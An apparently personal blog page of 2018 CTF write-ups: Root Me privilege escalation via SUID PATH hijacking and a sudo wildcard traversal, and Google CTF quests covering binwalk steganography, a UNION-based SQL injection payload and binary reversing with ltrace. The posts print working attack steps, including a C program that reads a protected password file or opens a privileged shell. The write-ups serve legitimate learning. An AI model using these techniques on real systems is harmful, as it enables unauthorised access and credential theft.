sabato 6 ottobre 2018

RootMe - CTF App Security - Bash - System 2

I'm considering seriously the CTF topic, it is so funny but I need to learn more and more.

A good choice to start learning is


Root Me allows us to practice with a lot of challenges, classified in arguments: App - Script, App - System, Cracking, Cryptanalysis, Forensic, Network, Programming, Realist, Steganography, Web - Client, Web - Server.

Let's start with the first category: App - Script.

The third challenge that we face is: Bash - System 2:

Vulnerability type:
  • Privilege Escalation by SETUID permission

##################################################

This challenge is very similar to the Bash - System 1. At the beginning, open terminal and type:
  • ssh -p 2222 app-script-ch12@challenge02.root-me.org
to connect to the target system. If it asks for a password, insert app-script-ch12.

If we type ls -la command, we will see three files: ch12ch12.c and .passwd. I note also that ch12 and .passwd have the same owner (user) app-script-ch12-cracked.

It's easy to note that .passwd contains the solution of the challenge.

If we try to read the .passwd file by cat, less, more, etc. we cannot do that due to the permissions, indeed only the owner of this file has the privileges to READ that file. How can we do?

We can use a "weakness" caused by the SETUID (SET User ID) set by 1. This kind of exploit allows us to perform privilege escalation to execute a program with the owner's program privilege, even though we are not the owner.

The SETUID is a permission that can be set on files. Generally it can be set by the command: chmod u+s filename or chmod 4755 filename. This command substitutes the x parameter on the User (owner) permission with s.

In our case, we cannot chmod the interested file because we don't have permissions on them, but we can find which files have already the SETUID set. To check this, we type:
  • find / -perm -u=s -type f 2>/dev/null
In this way, we will search for all files that have SETUID set by 1. I note that ch12 has SETUID set by 1 so I can execute this program (so this process) as the owner of the program (that is the same owner of .passwd).

How does ch12 work? To check this, I can open the ch12.c file by less ch12.c. I note that ch12 executes ls -lA command on .passwd file. I need to read that file. How can I do?

One solution is to substitute the ls command of this system with another command or making a program and rename this last command/program as ls. For example I can substitute ls command with nano or I can make a new C program: in this way, when the ch12 will perform its code, the ls command will execute the C program. To do this, type:
  • mkdir /tmp/challenge1 --> The /tmp directory is one of directories that gives for all users all permissions (read/write/execute) since I don't have privileges anywhere. I use it to copy or create the C program that I desire to substitute to ls.
  • cd /tmp/challenge1
Make the C program like:
#include <stdlib.h>
#include <stdio.h>

int main(){

system("cat /challenge/app-script/ch12/.passwd");

//system("/bin/sh -i"); comment above and uncomment if you want a shell with app-script-ch12-cracked privileges
        return 0;
}
  • gcc -m32 -o program program.c
  • mv program ls --> Rename program as ls
  • export PATH=/tmp/challenge1:$PATH
  • cd ~ --> Come back to the starting directory /challenge/app-script/ch12/
  • ./ch12
In this way, when ch12 will be performed, when the following piece of ch12 code will be executed 

system("ls -lA /challenge/app-script/ch12/.passwd");

ls will correspond to program, so the solution will be printed on the terminal and we insert it as password in the challenge webpage to end.

Note that we can substitute ls with any Linux command or we can make a script or a program (i.e. C program) and rename its name as ls and insert in the PATH environment variable its location. This makes us understand how this exploit is dangerous as it allows any users to escalate privileges and execute commands of other users (like also root).

Useful links:
http://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/

Pubblicato da alle Nessun commento:
Etichette: , , , ,

RootMe - CTF App Security - Sudo - Weak Configuration

Let's come back to the second challenge of


Root Me allows us to practice with a lot of challenges, classified in arguments: App - Script, App - System, Cracking, Cryptanalysis, Forensic, Network, Programming, Realist, Steganography, Web - Client, Web - Server.

Let's start with the first category: App - Script.

The second challenge that we face is: Sudo - Weak Configuration:

Vulnerability type:
  • Privilege Escalation by Sudo weak configuration

##################################################

In this challenge, on the current directory we have two directories ch1 and ch1cracked and one readme.md file.
If we read the readme.md file, the content says that the .passwd is located to /challenge/app-script/ch1/ch1cracked/.
If I try to cd ch1cracked, I will get permission error so I cannot access. By ls -la we see that only app-script-ch1-cracked can access to that folder.

We need to check by sudo command what command and on which locations our user (app-script-ch1) could execute as app-script-ch1-cracked user.

To to this, we type:
  • sudo -l
and we get:
Matching Defaults entries for app-script-ch1 on challenge02:


    env_reset,



    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,



    !mail_always, !mail_badpass, !mail_no_host, !mail_no_perms,



    !mail_no_user



User app-script-ch1 may run the following commands on challenge02:



    (app-script-ch1-cracked) /bin/cat /challenge/app-script/ch1/ch1/*
Focus on the last two rows: our user can execute cat command working on /challenge/app-script/ch1/ch1 folder as app-script-ch1-cracked user. You can see the * at the end, this allows us to append everything we want. For example we could replace the * with ../ or append a whole path.

To access to the ch1cracked folder and to the .passwd file, type:
  • cd ch1
  • sudo -u app-script-ch1-cracked cat /challenge/app-script/ch1/ch1/../ch1cracked/.passwd
or
  • cd ch1
  • sudo -u app-script-ch1-cracked cat /challenge/app-script/ch1/ch1/ ../ch1cracked/.passwd
or
  • cd ch1
  • sudo -u app-script-ch1-cracked cat /challenge/app-script/ch1/ch1/shared_notes /challenge/app-script/ch1/ch1cracked/.passwd
In this way, we execute the cat command as the app-script-ch1-cracked user. 
IMPORTANT: the input directory MUST BE an absolute path, and we must pass through /challenge/app-script/ch1/ch1 directory before to reach our target file .passwd otherwise we get permission error.
On the second option above, the allowed directory must finish with '/'.

Entering this command, it asks for app-script-ch1 password, so we insert app-script-ch1 as password (the same that we used to log by SSH at the start of the challenge).

We will get the solution.


Pubblicato da alle Nessun commento:
Etichette: , , , ,

RootMe - CTF App Security - Bash - System 1

I'm considering seriously the CTF topic, it is so funny but I need to learn more and more.

A good choice to start learning is


Root Me allows us to practice with a lot of challenges, classified in arguments: App - Script, App - System, Cracking, Cryptanalysis, Forensic, Network, Programming, Realist, Steganography, Web - Client, Web - Server.

Let's start with the first category: App - Script.

The first challenge that we face is: Bash - System 1:

Vulnerability type:

  • Privilege Escalation by SETUID permission

##################################################

I'm using Kali Linux. At the beginning, open terminal and type:
  • ssh -p 2222 app-script-ch11@challenge02.root-me.org
to connect to the target system. If it asks for a password, insert app-script-ch11.

If we type ls -la command, we will see three files: ch11, ch11.c and .passwd. I note also that ch11 and .passwd have the same owner (user) app-script-ch11-cracked.

It's easy to note that .passwd contains the solution of the challenge.

If we try to read the .passwd file by cat, less, more, etc. we cannot do that due to the permissions, indeed only the owner of this file has the privileges to READ that file. How can we do?

We can use a "weakness" caused by the SETUID (SET User ID) set by 1. This kind of exploit allows us to perform privilege escalation to execute a program with the owner's program privilege, even though we are not the owner.

The SETUID is a permission that can be set on files. Generally it can be set by the command: chmod u+s filename or chmod 4755 filename. This command substitutes the x parameter on the User (owner) permission with s.

In our case, we cannot chmod the interested file because we don't have permissions on them, but we can find which files have already the SETUID set. To check this, we type:
  • find / -perm -u=s -type f 2>/dev/null
In this way, we will search for all files that have SETUID set by 1. I note that ch11 has SETUID set by 1 so I can execute this program (so this process) as the owner of the program (that is the same owner of .passwd).

How does ch11 work? To check this, I can open the ch11.c file by less ch11.c. I note that ch11 executes ls command on .passwd file. I need to read that file. How can I do?

One solution is to substitute the ls command of this system with another command and rename this last command as ls. For example I can substitute ls command with cat: in this way, when the ch11 will perform its code, the ls command will execute the cat command. To do this, type:
  • mkdir /tmp/challenge1 --> The /tmp directory is one of directories that gives for all users all permissions (read/write/execute) since I don't have privileges anywhere. I use it to copy or create the command that I desire to substitute to ls.
  • which cat --> It allows us to know where cat command is located. It will be on /bin/cat.
  • cp /bin/cat /tmp/challenge1 | cd /tmp/challenge1
  • mv cat ls --> Rename cat as ls
  • export PATH=/tmp/challenge1:$PATH
  • cd ~ --> Come back to the starting directory /challenge/app-script/ch11/
  • ./ch11
In this way, when ch11 will be performed, when the following piece of ch11 code will be executed 

system("ls /challenge/app-script/ch11/.passwd");

ls will correspond to the cat command, so the solution will be printed on the terminal and we insert it as password in the challenge webpage to end.

Note that we can substitute ls with any Linux command or we can make a script or a program (i.e. C program) and rename its name as ls and insert in the PATH environment variable its location. This makes us understand how this exploit is dangerous as it allows any users to escalate privileges and execute commands of other users (like also root).

Useful links:
http://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/

Pubblicato da alle 1 commento:
Etichette: , , , ,

domenica 9 settembre 2018

Deal with it - Boot Kali Linux by USB IN RIGHT WA4A4A4AY! (Bye CD-ROM couldn't be mounted)

Yesterday I was installing the new version of Kali Linux, the 2018.3 (yep, we are at the end of 2018... and I'm getting old... WTF) via USB.

While I was happy to install it, during the installation I got the following error:


YEEEEEEE! AND NOW?????? FK THIS!
Ok...

To solve this problem, I suggest to use RUFUS (https://rufus.akeo.ie/) to create bootable USB drive, in this case for Kali Linux (because other softwares are obviously retard).

Simply, download the last version of Rufus (I downloaded the portable version because I don't know, I will try to find an answer this night), insert your USB key into your machine and start Rufus


The only way to see each fkin word is set the image like extra-large, but I prefer large size... :(. Anyway, fill all forms like this:


Then, click on START. You will get this window:


IT'S IMPORTANT LIKE SAVING THE WORLD THAT YOU CLICK ON THE SECOND OPTION (that I already set for you on the image, "Thank you", no problem): "Write in DD image mode".

Rufus allows you to set the writing of the Kali Linux ISO in DD image mode because the Kali Linux ISO file is an ISOHybrid image.

However click on OK, wait 100000 centuries and finally try your bootable USB and you should not have problems during the installation of Kali Linux (BYE BYE CD-ROM ERROR AHAHAHAHAHAHHAHAHAH FKU!)

Now, I think, so I am (Cogito ergo sum)... Ehm, I wrong post sorry. I would say: NOW I go to buy a


The Extra-large size is mandatory :-Q

Enjoy your food ^^
Pubblicato da alle Nessun commento:
Etichette: , ,

sabato 8 settembre 2018

Beginners Quest (Google CTF) - 7° Floppy

Today is a Saturday. Wow, weekend.

I want to continue our journey




Used tools:
  • binwalk
The state of the art is


And the beginners quest of today is


As always, download the attachment, check the file type, rename it and extract the content:
  • file 4e69382f661878c7da8f8b6b8bf73a20acd6f04ec253020100dfedbd5083bb39
It is a zip file.
  • mv 4e69382f661878c7da8f8b6b8bf73a20acd6f04ec253020100dfedbd5083bb39 floppy.zip
  • unzip floppy.zip
The content is composed of one file called foo.ico. If we type:
  • file foo.ico
we get:
foo.ico: MS Windows icon resource - 1 icon, 32x32, 16 colors

This is clearly a steganography quest, we need to extract the content of this .ico file. Let's type:
  • strings foo.ico
and we get some strings where we understand that in this file is probably hidden a file called driver.txt.

Just use the binwalk tool to extract hidden files from the foo.ico file:
  • binwalk -e foo.ico
If we type ls command, we note a folder called _foo.ico.extracted, just access on it and you will see 3 files: driver.txt, www.com and 2FD.zip.

Just open the driver.txt file and you will get the solution key.

At this point, our path will be



If you want to be SPOILED for the solution key, just click below

Pubblicato da alle Nessun commento:
Etichette: , , , , , , ,

sabato 25 agosto 2018

Beginners Quest (Google CTF) - 6° Media-DB

Good afternoon! (this time is afternoon)

QUICKLY! NoEXPLANATION

Used techniques:
  • SQL Injection with UNION statement










As always, download the attachment, check the file type, rename it and extract the content:
  • file 2b6cfe9b17556d78cd7142e39400f9bf711f98eefb6332811088bd11a9665523
It is a zip file.
  • mv 2b6cfe9b17556d78cd7142e39400f9bf711f98eefb6332811088bd11a9665523 mediadb.zip
  • unzip mediadb.zip
The content is composed of a python file media-db.py that contains the code that describes how the application at media-db.ctfcompetition.com 1337 works.

For first, type:
  • nc media-db.ctfcompetition.com 1337
The application starts. Try to analyze how it works.
Then, open the media-db.py file and analyze it. You understand that this quest could be solved with SQL Injection. First of all, this application creates 2 tables: oauth_tokens (with 1 field: oauth_token) and media (2 fields: artist and song). This application shows 4 options:
  1. Add song: here, if we insert a string for artist and song with " character, this character will be deleted. Then this option executes:

    INSERT INTO media VALUES ("{}", "{}")""".format(artist, song)
  2. Play artist: here, if we insert the name of an artist, if this name is contained in the DB, the application will show the artist and the song. To extract this information from the DB, this option executes:

    SELECT artist, song FROM media WHERE artist = '{}'".format(artist)
  3. Play song: here, if we insert the name of a song, if this name is contained in the DB, the application will show the artist and the song. To extract this information from the DB, this option executes:

    SELECT artist, song FROM media WHERE song = '{}'".format(song)
  4. Shuffle artist: chooses songs from random artist and prints them:

    SELECT artist, song FROM media WHERE artist = '{}'".format(artist)
Looking these choices, the strategy to manipulate the DB could be: since the 2, 3 and 4 options read directly from DB, I can try to insert SQL command by option 1. If we see these 3 options, a good method could be to insert an artist name following by ' character and then we can use other SQL statements to get what we want from the DB.
BUT there is a problem: the options 2 and 3 have a control on the ' character because if I insert artistname' to close the value of WHERE statement, the ' character is deleted (look the .py file), but the option 4 does not have this kind of control so I can use the option 4 to execute the SQL command with our injection.
As said before, we have 2 tables, media and oauth_tokens. So, the strategy is: I insert an artist name, then close the WHERE statement with ' character and I can continue the SQL command by using the UNION statement that I can use to select other fields from the same table or another table of the DB, so I will use UNION to select the interested field of the oauth_tokens table that I guess is the table containing the oauth token as described in the quest text. Then I will close the SQL command with -- to comment all the codes/characters/words/etc after -- because I don't need of them.

Just one note: if we use the UNION statement with SELECT, the number of columns of the two SELECT statement before and after the UNION should be the same. In our case, reading the code, the first SELECT has two columns, artist and song, so also the SELECT after the UNION should be two columns.

Try to train in this website https://kripken.github.io/sql.js/GUI/ with the SQL rules.

Ok, so... 
  • nc media-db.ctfcompetition.com 1337
  • Select 1
  • As artist insert: anycakeyouwant' UNION SELECT oauth_token, 2 FROM oauth_tokens -- (In the second SELECT I can use also any number or any "string" (with double quotes), but in this case the "string" does not work because we said that the option 1 deletes all the " character from the artist and song name, so here use just a number)
  • As song insert: whatyouwant
  • Select 4
In this way, the SQL command that will be executed by SQL interpreter will be:

SELECT artist, song FROM media WHERE artist = 'anycakeyouwant' UNION SELECT oauth_token, 2 FROM oauth_tokens --

So, this SQL command will read also the content of the oauth_tokens table that contains the solution key.

And also this time MY WORK IS DONE!


If you want to be SPOILED for the solution key, just click below

Pubblicato da alle Nessun commento:
Etichette: , , , , , ,

venerdì 24 agosto 2018

Beginners Quest (Google CTF) - 5° Gatekeeper

Again the same saddddday

https://capturetheflag.withgoogle.com

Used commands/tools:
  • strings
  • Hopper Disassembler
  • ltrace
The AS-IS is


Let's continue our JOURNEY



As always, download the attachment, check the file type, rename it and extract the content:
  • file f7e577b61f5b98aa3c0e453e83c60729f6ce3ef15c59fc76d64490377f5a0b5b
It is a zip file.
  • mv f7e577b61f5b98aa3c0e453e83c60729f6ce3ef15c59fc76d64490377f5a0b5b gatekeeper.zip
  • unzip gatekeeper.zip
The content is composed of one file called gatekeeper. If we type:
  • file gatekeeper
we get:

gatekeeper: ELF 64-bit LSB shared object, x-86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=a89(and other digits), not stripped

This file is a binary so we can give it executable permission:
  • chmod +x gatekeeper
Run this file:
  • ./gatekeeper
It asks for username and password as arguments like:
  • ./gatekeeper user passadmin
We get message of wrong username. So we see that the program allows us to know if we insert wrong username or wrong password.
If we try to look the content of this file in an ordered manner by:
  • strings gatekeeper
we see different strings and we can understand that the possible username is 0n3_W4rM and the possible password is zLl1ks_d4m_T0g_I. If we try to submit these credentials, the username results correct, the password is not. Other useful information is not shown by using the strings command.
At this point, it's clear that this quest could be solved by disassembling the gatekeeper file.
We can do this by using a disassembler like Hopper Disassembler that you can download from https://www.hopperapp.com. After you installed this software, open it by:
  • /opt/hopper-v4/bin/Hopper
This is a demo version with some limitation, i.e. one session lasts for 30 minutes. When the software is open, click on Try the Demo, then File->Read Executable to Disassemble... and select the gatekeeper file, a window appears, select ELF as Loader and click OK. On the left, click on the TAB Strs where the strings inside the file are shown. Select on the username 0n3_W4rM and the code will be redirected to the address 0000000000000de0 that contains the following:

db                 "0n3_W4rM", 0                          ; DATA_XREF=main+133

Now we can double click on main+133 and we will be redirected to the address 0000000000000a3c that contains the following assembly code:

lea                rsi, qword [a0n3W4rM]              ;  argument "__s2" for method j_strcmp, "0n3_W4rm"

From this line we can view the pseudocode by selecting this line and press ALT+ENTER on the keyboard or by clicking on the menu of the application Window->Show Pseudo Code of Procedure. By the pseudocode, we can understand how the interested part works. By the pseudocode, we understand that the username 0n3_W4rM is correct while the variable that contains the second input argument passes through some calculation before to go to the strcmp with zLl1ks_d4m_T0g_I.

For being sure on how the program works, we can try to run the program by using the ltrace command to trace what procedures the executable calls.

If ltrace is not installed on your machine (like Kali Linux OS), the current version of ltrace cannot be installed because of different problems that arise during the compiling and installation BUT I suggest you how to fix the current version (I repeat, I'm using Kali Linux distro). First of all, download ltrace from https://www.ltrace.org/. Extract all the content, enter in the folder, then type:
  • ./configure
  • gedit sysdeps/linux-gnu/proc.c
In the proc.c file search readdir_r and change readdir_r(...) with readdir(d) because the first one is deprecated, then delete (or comment) the declaration of entry and *result variables, and substitute the variable result (where is used) with readdir(d) (should be three points to substitute). Save the file and close gedit. Then type:
  • gedit value.c
Here comment or delete the declaration of typedef char assert__long_enough_long. Save the file and close it. Then type:
  • gedit lens_default.c
Here comment or delete the declaration of typedef char assert__long_enough_long. Save the file and close it. Then type:
  • gedit ltrace-elf.c
Go to the line 221, then substitute the if(!need_data(...) < 0 ) with if(!(need_data(...)) != 0). Save the file and close it. At the end type:
  • make
  • make install
When the process ends, you have installed ltrace and you can call it from any path you are.

Now come back to the gatekeeper folder.
With ltrace, we will use grep command to extract the only rows contained strcmp to check the row where our second argument is compared with zLl1ks_d4m_T0g_I (as we saw from the pseudocode):
  • ltrace ./gatekeeper 0n3_W4rM randompassword
we can look from the output that on strcmp, zLl1ks_d4m_T0g_I is compared with the backward version of randompassword that is drowssapmodnar. To filter this evidence you can type:
  • ltrace ./gatekeeper 0n3_W4rM randompassword 2>&1 | grep "strcmp"
and you can see clearly strcmp("drowssapmodnar", "zLl1ks_d4m_T0g_I"). It means that the right password to insert is the backward version of zLl1ks_d4m_T0g_I that is I_g0T_m4d_sk1lLz. Finally we can execute the gatekeeper program by typing:
  • ./gatekeeper 0n3_W4rM I_g0T_m4d_sk1lLz
This time the application will accept also the password and it will be shown the solution key.

IT IS THE END!


If you want to be SPOILED for the solution key, just click below

Pubblicato da alle Nessun commento:
Etichette: , , , , , ,
Iscriviti a: Post (Atom)